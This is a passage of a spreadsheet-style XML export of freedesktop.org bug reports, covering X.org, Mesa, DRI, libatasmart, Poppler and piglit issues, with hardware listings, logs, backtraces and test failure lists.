XEmacs 21.5  (beta27) fiddleheads [Lucid] (i686-redhat-linux Mule) of Thu Jan 25 2007 on hammer2.fedora.redhat.com
I'm using the nvidia-graphics9629 drivers from ATrpms.</t>
  </si>
  <si>
    <t>dan.krejsa</t>
  </si>
  <si>
    <t>XORG-15949</t>
  </si>
  <si>
    <t>LVDS-0 has wrapped screen with Randr1.2</t>
  </si>
  <si>
    <t>Created attachment 16562
Xorg log with external monitor plugged in
Problem:
Left-most 10px of my laptop's screen are offset right 10px right-most 10px are displayed on the left of that screen. VGA-0 has no problems.
Steps to re-produce:
xrandr --output VGA-0 --mode 640x480 # to eleminate my previous Virtual line as a source of the problem
xrandr --output VGA-0 --left-of LVDS-0
xrandr --output LVDS-0 --mode 1280x800
Expected result:
The laptop and the external monitor form one large desktop with all pixels in their correct spots!
Actual result:
See attached images
Work-around:
This problem persists even if the external monitor is removed and the computer re-booted. The only way to restore the correct display of LVDS-0 is to disable Randr1.2 in xorg.conf and re-boot (zapping X doesn't help in this case).
-------------------------------------------------------------------------
[root@castlereagh ~]# lspci -vv -d10de:0244
00:05.0 VGA compatible controller: nVidia Corporation C51 [Geforce 6150 Go] (rev a2) (prog-if 00 [VGA controller])
	Subsystem: Hewlett-Packard Company Unknown device 30bf
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 17
	Region 0: Memory at b2000000 (32-bit non-prefetchable) [size=16M]
	Region 1: Memory at c0000000 (64-bit prefetchable) [size=256M]
	Region 3: Memory at b1000000 (64-bit non-prefetchable) [size=16M]
	Capabilities: [48] Power Management version 2
		Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
		Status: D0 PME-Enable- DSel=0 DScale=0 PME-
	Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable-
		Address: 0000000000000000  Data: 0000
	Kernel modules: nvidiafb
-------------------------------------------------------------------------
carl@castlereagh:~$ lshal
[snip]
udi = '/org/freedesktop/Hal/devices/pci_10de_244'
  info.parent = '/org/freedesktop/Hal/devices/computer'  (string)
  info.product = 'C51 [Geforce 6150 Go]'  (string)
  info.subsystem = 'pci'  (string)
  info.udi = '/org/freedesktop/Hal/devices/pci_10de_244'  (string)
  info.vendor = 'nVidia Corporation'  (string)
  linux.hotplug_type = 2  (0x2)  (int)
  linux.subsystem = 'pci'  (string)
  linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:05.0'  (string)
  pci.device_class = 3  (0x3)  (int)
  pci.device_protocol = 0  (0x0)  (int)
  pci.device_subclass = 0  (0x0)  (int)
  pci.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:05.0'  (string)
  pci.product = 'C51 [Geforce 6150 Go]'  (string)
  pci.product_id = 580  (0x244)  (int)
  pci.subsys_product_id = 12479  (0x30bf)  (int)
  pci.subsys_vendor = 'Hewlett-Packard Company'  (string)
  pci.subsys_vendor_id = 4156  (0x103c)  (int)
  pci.vendor = 'nVidia Corporation'  (string)
  pci.vendor_id = 4318  (0x10de)  (int)
[snip]</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-42108</t>
  </si>
  <si>
    <t>xorg.fd.org logo broken since annarchy upgrade</t>
  </si>
  <si>
    <t>http://www.x.org/wiki/Home is missing its logo.
The html is looking for http://xorg.freedesktop.org/png/fdx-logo-text.png
which is not found since that seems to be mapping to 
/srv/www.freedesktop.org/www/png/ (which is missing that file) instead of
/srv/xorg.freedesktop.org/www/png/ (which has that file).</t>
  </si>
  <si>
    <t>MESA-68802</t>
  </si>
  <si>
    <t>Blu-ray playback fine on UVD in mplayer2 but stutter in XBMC</t>
  </si>
  <si>
    <t>Created attachment 84982
dmesg
Blu-ray  that playback without any issues on UVD in mplayer2 stutter in XBMC (in both cases VDPAU is enabled and used for video decoding). BDRemux sample: http://www.multiupload.nl/WVDLZSI9B0
Adjust Refreshrate to match video option doesn't make noticeable difference in this case. XBMC running not under compositing manager but in separate LightDM session. According to XBMC developers they just implement VDPAU spec and if there is some issues with video playback I have to report it to driver developers first.
Radeon HD 6310
Linux 3.11 with drm-next from this folder: http://kernel.ubuntu.com/~kernel-ppa/mainline/drm-next/current/ (build 3.11.0-996.201308300442). radeon.dpm is enabled.
libdrm 2.4.46+git1308291007.f17d41
xserver-xorg-video-radeon 7.2.0+git1308270847.8927d3
Mesa 9.3~git1308301002.74be77
libvdpau1 0.7-1
XBMC 12.2~git20130521.1119
Ubuntu 13.04 x86_64
Driver Mesa and firmwares installed from this PPA: https://launchpad.net/~oibaf/+archive/graphics-drivers
XBMC installed from this PPA: https://launchpad.net/~wsnipex/+archive/xbmc-xvba-frodo
dmesg output attached.
vdpauinfo output attached.</t>
  </si>
  <si>
    <t>DRI-53045</t>
  </si>
  <si>
    <t>Incorrect picture with AMD 6970</t>
  </si>
  <si>
    <t>I apologize for my English.
I have incorrect picture. After installing Arch Linux or Opensuse 12.1 the picture seems like divided at 3 fragments but instead [1 2 3] I have [3 1 2] or [2 3 1]. (Look the photo). No matter with which monitor - I tried 2 monitors. Sometimes I receive just black screen (1 of 3 cases or [3 1 2] or [2 3 1]).
I have this problem at TTY and X too.
CPU: AMD Phenom II X4
GPU: AMD 6970
Xorg driver: xf86-video-ati 1:6.14.6-1
Photo of TTY console:  http://img194.imageshack.us/img194/9861/112233d.jpg
Photo of X desktop running XFCE4:  http://img694.imageshack.us/img694/6843/111222333q.jpg
Kernel version:  Linux sirius 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
dmesg output:  https://gist.github.com/3226626
lspci output:  https://gist.github.com/3226632
xrandr output:  https://gist.github.com/3226636
Xorg.0.log | grep EDID log:  https://gist.github.com/3226645
Full Xorg.0.log:  https://gist.github.com/3227022
Please tell me which information I had to provide to help solve this problem.</t>
  </si>
  <si>
    <t>ekzo.tech</t>
  </si>
  <si>
    <t>MESA-28966</t>
  </si>
  <si>
    <t>[r300g] Dynamic branching 3 demo does not run</t>
  </si>
  <si>
    <t>I'm filing this just in case it's of interest for those hacking shaders on r300. Humus DynamicBranching3 demo does not run:
 Note: 'for (i ... )' body is too large/complex to unroll
 Fragment program using varying vars not written by vertex shader
For reference this demo does work with the i965 driver.
http://www.humus.name/index.php?page=3D&amp;ID=67
System environment:
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- GPU: RV570
-- Model: Asus EAX1950Pro 256MB
-- Display connector: DVI
-- xf86-video-ati: 801e83227a59a29eea425ea612083bbf2b536c30
-- xserver: 1.8.1.901
-- mesa: 61a26cdfdc9c75a83c0d362c973d5436fe077be4
-- drm: 6ea2bda5f5ec8f27359760ce580fdad3df0464df
-- kernel: 2.6.35-rc3</t>
  </si>
  <si>
    <t>MESA-12614</t>
  </si>
  <si>
    <t>segfault inside quadfunc_unfilled_rgba()</t>
  </si>
  <si>
    <t>I'm geting segfaults with two different programs (metisse and neverball) when using drivers r200 and i915. The crashs happen inside quadfunc_unfilled_rgba().
I tried both mesa 7.0.1 and the version from git (origin/mesa_7_0_branch) both cause a segfault of the application. When running neverball the xserver actually freezes untill neverball is killed (-9).
Below is a backtrace from neverball (a KDE game: http://icculus.org/neverball/).
I'll try to prepare a simpler testcase but maybe the backtrace is of some help:
Starting program: /usr/games/neverball.bin
[Thread debugging using libthread_db enabled]
[New Thread -1218353456 (LWP 10800)]
[New Thread -1221067888 (LWP 10803)]
Mesa: CPU vendor: GenuineIntel
Mesa: CPU name: Intel(R) Celeron(R) M CPU        410  @ 1.46GHz
Mesa: MMX cpu detected.
Mesa: SSE cpu detected.
Mesa: Not testing OS support for SSE leaving enabled.
Mesa: Mesa 7.0.1 DEBUG build Sep 28 2007 14:31:57
Mesa warning: couldn't open libtxc_dxtn.so software DXTn compression/decompression unavailable
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1218353456 (LWP 10800)]
0xb6a64013 in quadfunc_unfilled_rgba (ctx=0x81d2140 v0=0 v1=1 v2=2 v3=3) at swrast_setup/ss_tritmp.h:201
201           GLubyte ef1 = VB-&gt;EdgeFlag[v1]
(gdb) bt
#0  0xb6a64013 in quadfunc_unfilled_rgba (ctx=0x81d2140 v0=0 v1=1 v2=2 v3=3) at swrast_setup/ss_tritmp.h:201
#1  0xb69de3e7 in _tnl_render_quads_verts (ctx=0x81d2140 start=0 count=4 flags=55) at tnl/t_vb_rendertmp.h:338
#2  0xb69dfc9f in run_render (ctx=0x81d2140 stage=0x820fccc) at tnl/t_vb_render.c:320
#3  0xb69d2984 in _tnl_run_pipeline (ctx=0x81d2140) at tnl/t_pipeline.c:158
#4  0xb691138e in intelRunPipeline (ctx=0x81d2140) at intel_tris.c:764
#5  0xb69d38b1 in _tnl_draw_prims (ctx=0x81d2140 arrays=0x81fdea8 prim=0x81fca04 nr_prims=1 ib=0x0 min_index=0
    max_index=3) at tnl/t_draw.c:403
#6  0xb69c89e1 in vbo_exec_vtx_flush (exec=0x81fc8e0) at vbo/vbo_exec_draw.c:215
#7  0xb69c7493 in vbo_exec_FlushVertices (ctx=0x81d2140 flags=1) at vbo/vbo_exec_api.c:685
#8  0xb69623a0 in _mesa_PopMatrix () at main/matrix.c:274
#9  0x080507dc in sol_back (fp=0x80772c0 n=256 f=512 t=124.494003) at share/solid.c:214
#10 0x0805a1d4 in game_draw_back (pose= d= p=)
    at ball/game.c:348
#11 0x0805ab46 in game_draw (pose=0 st=0) at ball/game.c:479
#12 0x0806486c in title_paint (id=19 st=0) at ball/st_title.c:108
#13 0x080580ff in st_paint () at share/state.c:69
#14 0x08065b2a in main (argc=Cannot access memory at address 0x1
) at ball/main.c:272
#15 0xb7bd1f90 in __libc_start_main () from /lib/i686/libc.so.6
#16 0x0804a641 in _start ()</t>
  </si>
  <si>
    <t>XORG-54397</t>
  </si>
  <si>
    <t>New backlight option in manpage is malformed</t>
  </si>
  <si>
    <t>There's a missing 'q' preceding Backlight. Also there's a trailing server log.
Thanks for the option though it's just what my laptop needs!</t>
  </si>
  <si>
    <t>dgbaley27</t>
  </si>
  <si>
    <t>LIBATASMART-24951</t>
  </si>
  <si>
    <t>Probing [0928:0000] causes USB resets</t>
  </si>
  <si>
    <t>We got another report about a device where ata smart probing causes USB resets:
$ sudo skdump /dev/sdc
Device: sat12:/dev/sdc
Type: 12 Byte SCSI ATA SAT Passthru
Size: 1907348 MiB
Awake: Operation not supported
ATA SMART not supported.
Shortly after getting the skdump the device was offlined:
Nov 4 20:00:02 bauer kernel: [ 4981.580059] usb 1-3: reset high speed USB device using ehci_hcd and address 3
Nov 4 20:00:33 bauer kernel: [ 5012.124040] usb 1-3: reset high speed USB device using ehci_hcd and address 3
Nov 4 20:01:04 bauer kernel: [ 5042.668039] usb 1-3: reset high speed USB device using ehci_hcd and address 3
Nov 4 20:01:14 bauer kernel: [ 5053.024045] usb 1-3: reset high speed USB device using ehci_hcd and address 3
Nov 4 20:01:24 bauer kernel: [ 5063.268100] usb 1-3: USB disconnect address 3
Nov 4 20:01:24 bauer kernel: [ 5063.268779] scsi 6:0:0:0: Device offlined - not ready after error recovery
(This is with disabling the udev rule for dk-d ata smart probe with it the device doesn't appear at all).
(libatasmart 016)
Should I get an strace from the reporter? Or should we just blacklist this device?
lsusb -v:
Bus 001 Device 012: ID 0928:0000 Oxford Semiconductor Ltd
Device Descriptor:
  bLength 18
  bDescriptorType 1
  bcdUSB 2.00
  bDeviceClass 0 (Defined at Interface level)
  bDeviceSubClass 0
  bDeviceProtocol 0
  bMaxPacketSize0 64
  idVendor 0x0928 Oxford Semiconductor Ltd
  idProduct 0x0000
  bcdDevice 0.00
  iManufacturer 1
  iProduct 2
  iSerial 3
  bNumConfigurations 1</t>
  </si>
  <si>
    <t>MESA-29305</t>
  </si>
  <si>
    <t>[softpipe] piglit glsl-vs-arrays-2 fails</t>
  </si>
  <si>
    <t>Created attachment 37446
glsl-vs-arrays2.png
mesa: 32ea5394173ecbfb766c5c02eccb21642aec0483 (master)
Run piglit glsl-vs-arrays-2 test.
$ ./bin/shader_runner tests/shaders/glsl-vs-arrays-2.shader_test
Probe at (00)
  Expected: 1.000000 0.000000 0.000000
  Observed: 0.003922 0.003922 0.000000
Probe at (2490)
  Expected: 0.000000 1.000000 0.000000
  Observed: 1.000000 0.003922 0.000000
Probe at (0249)
  Expected: 0.000000 0.000000 1.000000
  Observed: 0.003922 1.000000 0.000000
Probe at (249249)
  Expected: 1.000000 0.000000 1.000000
  Observed: 0.003922 0.003922 0.996078</t>
  </si>
  <si>
    <t>XORG-11964</t>
  </si>
  <si>
    <t>containerOf() not defined</t>
  </si>
  <si>
    <t>My compile from git bombs with the following:
glxdri.c: In function '__glXReportDamage':
glxdri.c:952: warning: implicit declaration of function 'containerOf'
glxdri.c:952: warning: nested extern declaration of 'containerOf'
glxdri.c:952: error: expected expression before '__GLXDRIdrawable'
glxdri.c:952: warning: initialization makes pointer from integer without a cast
glxdri.c: At top level:
glxdri.c:982: warning: initialization from incompatible pointer type
make[2]: *** [glxdri.lo] Error 1
make[2]: *** Waiting for unfinished jobs....</t>
  </si>
  <si>
    <t>DRI-23899</t>
  </si>
  <si>
    <t>[KMS S-Video TV-OUT] S-Video output is garbled</t>
  </si>
  <si>
    <t>Created attachment 29479
Xorg.log
I got a pretty good experience out of 2.6.30 but becouse of some minor annoyances I know should be fixed in .31 I could hardly wait to try it out on my system.
But I did found some problems and this is the biggest one the others will come later in other bugreports.
These problems and tries are with Xorg.
With 2.6.30 the resolution inteldrm used by default was 1024x768.
With 2.6.31 it uses 848x480. I do not know if this IS the problem but with this resolution parts of the screen seems to jump left and right time and time again.
It is not that bad that you cannot see what is going on on the screen but bad enough to not be a can live with it.
If I pull out xrandr and change to 800x600 it looks like an old CRT you try to force to run at a too high refresh rate.
If I change to 640x400 the picture seems stable.
Attaching dmesg Xorg and xrandr --verbose.
Versions are:
Linux pyttis 2.6.30-gentoo-r6 #1 SMP PREEMPT Sun Sep 13 12:37:18 CEST 2009 i686 Intel(R) Core(TM) Duo CPU T2350 @ 1.86GHz GenuineIntel GNU/Linux
libdrm-2.4.13
mesa-7.5.1
xorg-server-1.6.3.901
xf86-video-intel-2.8.1
Chipset:
00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 945GM/GMS 943/940GML Express Integrated Graphics Controller [8086:27a2] (rev 03) (prog-if 00 [VGA controller])
	Subsystem: AOPEN Inc. Device [a0a0:0632]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 16
	Region 0: Memory at fde80000 (32-bit non-prefetchable) [size=512K]
	Region 1: I/O ports at ff00 [size=8]
	Region 2: Memory at d0000000 (32-bit prefetchable) [size=256M]
	Region 3: Memory at fdf80000 (32-bit non-prefetchable) [size=256K]
	Expansion ROM at  [disabled]
	Capabilities: [90] MSI: Enable- Count=1/1 Maskable- 64bit-
		Address: 00000000  Data: 0000
	Capabilities: [d0] Power Management version 2
		Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
		Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME-
	Kernel driver in use: i915
00:02.1 Display controller [0380]: Intel Corporation Mobile 945GM/GMS/GME 943/940GML Express Integrated Graphics Controller [8086:27a6] (rev 03)
	Subsystem: AOPEN Inc. Device [a0a0:0632]
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Region 0: Memory at fdf00000 (32-bit non-prefetchable) [size=512K]
	Capabilities: [d0] Power Management version 2
		Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-D1-D2-D3hot-D3cold-)
		Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME-</t>
  </si>
  <si>
    <t>MESA-92408</t>
  </si>
  <si>
    <t>[SKL] [Regression] deqp-gles3 / functional / shaders / builtin_functions / precision 122 cases fail</t>
  </si>
  <si>
    <t>Setup:
--------
Hardware:
Platform: SKY LAKE Y A0 
CPU : Intel(R) Core(TM) m5-6Y57 CPU @ 1.10GHz (family: 6 model: 78  stepping: 3)
MCP : SKL-Y  D1 2+2 (ou ULX-D1)
QDF : QJK9 
CPU : SKL D0
Chipset PCH: Sunrise Point LP C1       
CRB : SKY LAKE Y LPDDR3 RVP3 CRB FAB2
Reworks : All Mandatories + FBS02FBS03 F23 O-02 &amp; O-06
Software
Linux : Ubuntu 14.04 LTS 64 bits
BIOS : SKLSE2R1.R00.X097.B02.1509020030
ME FW : 11.0.0.1173
Ksc (EC FW): 1.19
kernel 4.3.0-rc3-drm-intel-nightly+ (eb69e51) from git://anongit.freedesktop.org/drm-intel
Mesa - 11.0.2 from http://cgit.freedesktop.org/mesa/mesa/
xf86-video-intel - 2.99.917 from http://cgit.freedesktop.org/xorg/driver/xf86-video-intel/
Libdrm - 2.4.65 from http://cgit.freedesktop.org/mesa/drm/
Libva - 1.6.1 from http://cgit.freedesktop.org/libva/
vaapi intel-driver - 1.6.1 from http://cgit.freedesktop.org/vaapi/intel-driver
Cairo - 1.14.2 from http://cgit.freedesktop.org/cairo
Xorg Xserver - 1.17.2 from http://cgit.freedesktop.org/xorg/xserver
Regression:
------------
Tests were Pass with Mesa 10.6.7
Steps
------
Execute command:
./piglit -s -c run deqp_gles3 results/deqp_gles3
Actual result:
--------------
Following tests are fail
deqp-gles3@functional@shaders@builtin_functions@precision@abs@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@acos@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@acosh@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@acosh@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@acosh@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@add@highp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@add@lowp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@add@lowp_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@asin@mediump_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@asinh@highp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@asinh@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@atan2@mediump_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@atanh@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@atanh@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@atanh@lowp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@ceil@mediump_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@ceil@mediump_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@ceil@mediump_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@cosh@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@cosh@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@cosh@lowp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@cross@highp_fragment
deqp-gles3@functional@shaders@builtin_functions@precision@cross@mediump_vertex
deqp-gles3@functional@shaders@builtin_functions@precision@determinant@lowp_vertex@mat2
deqp-gles3@functional@shaders@builtin_functions@precision@div@mediump_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@div@mediump_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@dot@highp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@dot@mediump_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@exp2@mediump_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@exp2@mediump_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@exp@highp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@exp@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@exp@lowp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@faceforward@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@faceforward@highp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@faceforward@lowp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@faceforward@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@floor@lowp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@floor@lowp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@fract@highp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@inverse@mediump_fragment@mat2
deqp-gles3@functional@shaders@builtin_functions@precision@length@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@length@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@length@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@length@lowp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@length@lowp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@log@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@log@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@log@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@log@highp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@log@highp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@log@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@highp_fragment@mat3x2
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@highp_fragment@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@highp_vertex@mat3x2
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@highp_vertex@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@highp_vertex@mat4x2
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@lowp_fragment@mat3x2
deqp-gles3@functional@shaders@builtin_functions@precision@matrixcompmult@lowp_fragment@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@max@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@max@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@max@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@max@highp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@mod@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@mul@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@mul@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@mul@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@normalize@lowp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@outerproduct@lowp_vertex@mat3x2
deqp-gles3@functional@shaders@builtin_functions@precision@outerproduct@lowp_vertex@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@outerproduct@mediump_fragment@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@outerproduct@mediump_vertex@mat3
deqp-gles3@functional@shaders@builtin_functions@precision@outerproduct@mediump_vertex@mat4
deqp-gles3@functional@shaders@builtin_functions@precision@pow@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@pow@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@pow@lowp_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@radians@lowp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@radians@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@reflect@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@reflect@lowp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@reflect@lowp_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@reflect@lowp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@refract@highp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@refract@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@round@lowp_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@roundeven@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@sign@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@sin@lowp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@sin@lowp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@sin@lowp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@sinh@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@sinh@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@smoothstep@highp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@smoothstep@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@sqrt@mediump_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@sqrt@mediump_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@sqrt@mediump_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@sqrt@mediump_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@sub@highp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@sub@highp_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@sub@highp_vertex@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@sub@highp_vertex@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@tan@highp_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@tan@highp_fragment@vec3
deqp-gles3@functional@shaders@builtin_functions@precision@tan@highp_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@tanh@mediump_fragment@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@tanh@mediump_fragment@vec4
deqp-gles3@functional@shaders@builtin_functions@precision@tanh@mediump_vertex@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@highp_vertex@mat2
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@highp_vertex@mat2x3
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@highp_vertex@mat2x4
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@highp_vertex@mat3x4
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@highp_vertex@mat4
deqp-gles3@functional@shaders@builtin_functions@precision@transpose@lowp_vertex@mat3
deqp-gles3@functional@shaders@builtin_functions@precision@trunc@lowp_fragment@scalar
deqp-gles3@functional@shaders@builtin_functions@precision@trunc@mediump_vertex@vec2
deqp-gles3@functional@shaders@builtin_functions@precision@trunc@mediump_vertex@vec3
Expected result:
-----------------
Tests are Pass</t>
  </si>
  <si>
    <t>POPPLER-5946</t>
  </si>
  <si>
    <t>Poppler produces broken postscript</t>
  </si>
  <si>
    <t>When you print with scale it produces postscript with something like:
%%Page: 1 1
%%BeginPageSetup
%%PageOrientation: Portrait
pdfStartPage
-2.77556e-17 0.261905 translate
-0.0026 -0.0026 scale
0 0 378 576 re W
%%EndPageSetup
The reason lies somewhere in PSOutputDev in HEAD somehow imgWidth became -1.</t>
  </si>
  <si>
    <t>PIGLIT-31828</t>
  </si>
  <si>
    <t>shader_runner debug assertion fopen.c:54 (file != NULL)</t>
  </si>
  <si>
    <t>piglit: 765a6863a6ce0d5ba472c5deaa3e37d100fc37ba
Run a MSVC built shader_runner.exe with no arguments.
$ bin\shader_runner.exe
Debug Assertion Failed!
Program: C:\piglit\bin\shader_runner.exe
File: f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
Line: 54
Expression: (file != NULL)
FAULTING_IP: 
MSVCR100D!_fsopen+6f [f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c @ 54]
6b2e36df cc              int     3
EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6b2e36df (MSVCR100D!_fsopen+0x0000006f)
   ExceptionCode: 80000003 (Break instruction exception)
  ExceptionFlags: 00000000
NumberParameters: 3
   Parameter[0]: 00000000
   Parameter[1]: 8601fd48
   Parameter[2]: 00af0180
FAULTING_THREAD:  00000ca4
DEFAULT_BUCKET_ID:  STATUS_BREAKPOINT
PROCESS_NAME:  shader_runner.exe
ERROR_CODE: (NTSTATUS) 0x80000003 - {EXCEPTION}  Breakpoint  A breakpoint has been reached.
EXCEPTION_CODE: (HRESULT) 0x80000003 (2147483651) - One or more arguments are invalid
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  8601fd48
EXCEPTION_PARAMETER3:  00af0180
MOD_LIST: 
